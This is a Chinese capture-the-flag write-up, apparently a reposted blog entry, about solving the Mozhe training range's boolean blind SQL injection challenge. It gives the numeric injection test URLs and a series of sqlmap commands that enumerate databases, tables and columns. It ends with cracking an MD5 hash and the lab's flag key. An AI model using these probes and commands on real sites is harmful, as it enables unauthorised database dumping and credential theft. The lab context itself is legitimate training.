02#墨者靶场-SQL注入漏洞测试(布尔盲注)

                                                   墨者学习

                                                 By/shy014

1.进入靶场环境发现后台管理页面,尝试弱口令和万能密码失败,抓包查看登陆处也没有发现注入漏洞。

2.仔细查看该页面,发现一个新的链接,点击跳转,发现可能存在注入漏洞。

  1. 构造如下URL进行测试,确认存在数字型SQL注入漏洞,
  1. http://219.153.49.228:41979/new_list.php?id=1,有回显
  2. http://219.153.49.228:41979/new_list.php?id=1’,无回显
  3. http://219.153.49.228:41979/new_list.php?id=1 and 1=1 ,有回显
  4. http://219.153.49.228:41979/new_list.php?id=1 and 1=2 ,无回显

3.由于没有找到回显位,所以尝试布尔型盲注入,确定它当前的数据库名长度为10位。

4.直接使用sqlmap

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B

5.使用sqlmap读取数据库

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B –dbs

6.使用sqlmap读取当前数据库的表

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B -D=stormgroup –-tables

7.使用sqlmap读取member表中的字段

python2 sqlmap.py -u 219.153.49.228:41979/new_list.php?id=1*  -techenique=B -D stormgroup –T member –columns

8.使用sqlmap读取表中的内容

9.找网站解MD5

10.登陆发现key: mozhe683168a7ed356fe184d15dc8de6

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103083180